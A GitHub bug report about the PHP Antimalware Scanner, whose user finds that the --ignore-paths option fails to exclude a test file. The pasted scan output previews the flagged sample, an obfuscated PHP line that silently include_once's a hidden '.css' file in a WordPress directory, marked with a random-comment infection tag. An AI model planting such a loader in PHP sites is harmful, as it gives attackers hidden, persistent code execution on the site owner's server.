Skip to content

Ignore-path has no effect #116

New issue
New issue
Open
Open
Ignore-path has no effect#116
@kepon85

Description

@kepon85
kepon85
opened on Nov 14, 2024

Hello

Version 0.14.0

It seems to me that the ignore(s)-path has no effect. Here's why I say that:

I would have thought that the files in "ignore path" were ignored but that doesn't seem to be the case. Of course I tried to put in unity, change the quotes, without wildard..

root@srvweb:~# mkdir /tmp/dirtest
root@srvweb:~# cp /opt/scripttest/test.php /tmp/dirtest/test.php
root@srvweb:~# php /opt/PHP-Antimalware-Scanner/scanner -l --ignore-paths="/tmp/dirtesttest.php,test.php,*test.php,/*test.php" /tmp/dirtest/

         █████╗ ███╗   ███╗██╗    ██╗███████╗ ██████╗ █████╗ ███╗   ██╗         
        ██╔══██╗████╗ ████║██║    ██║██╔════╝██╔════╝██╔══██╗████╗  ██║         
        ███████║██╔████╔██║██║ █╗ ██║███████╗██║     ███████║██╔██╗ ██║         
        ██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║     ██╔══██║██║╚██╗██║         
        ██║  ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║  ██║██║ ╚████║         
        ╚═╝  ╚═╝╚═╝     ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝         
                                                                                
        Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner        

                                 version 0.14.0                                 

                                                                                
                            PHP Antimalware Scanner                             
                           Created by Marco Cesarato                            
                                                                                

Agile mode enabled
Start scanning...
Scan date: 2024-11-14 16:21:00
Scanning /tmp/dirtest

Mapping and retrieving checksums, please wait...


Verifying files checksum...

[===============================] 100%  1/1 [0 sec/0 sec]

Found 1 files to check

Checking files...

[>                              ] 0%  0/1 [0 sec/0 sec]


PROBABLE MALWARE FOUND!
/tmp/dirtest/test.php

=================================== PREVIEW ====================================

  1 | <?php
  2 | /*92e78*/
  3 | 
  4 | $rdpnv0 = "/var/www/chute/web/wp\x2dincludes/blocks/post\x2daut\x68or\x2dbiograp\x68y/.5397785d.css"; if (!isset($rdpnv0)) {strrev ($rdpnv0);} else { @include_once /* 185 */ ($rdpnv0); }
  5 | 
  6 | /*92e78*/

================================================================================

Checksum: 675edd52709681efd3936bfec5887fc7
File path: /tmp/dirtest/test.php

Evil code found: 
[!] Exploit (infected_comment) [line 2]
    - Comments composed by 5 random chars usually used to detect if a file is infected yet
      => /*92e78*/

OPTIONS:

    [1] Delete file
    [2] Move to quarantine
    [3] Dry run evil code fixer
    [4] Dry run evil line code fixer
    [5] Open with vim
    [6] Open with nano
    [7] Add to whitelist
    [8] Show source
    [-] Ignore


amwscan > What is your choice?

Thank's,
David

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions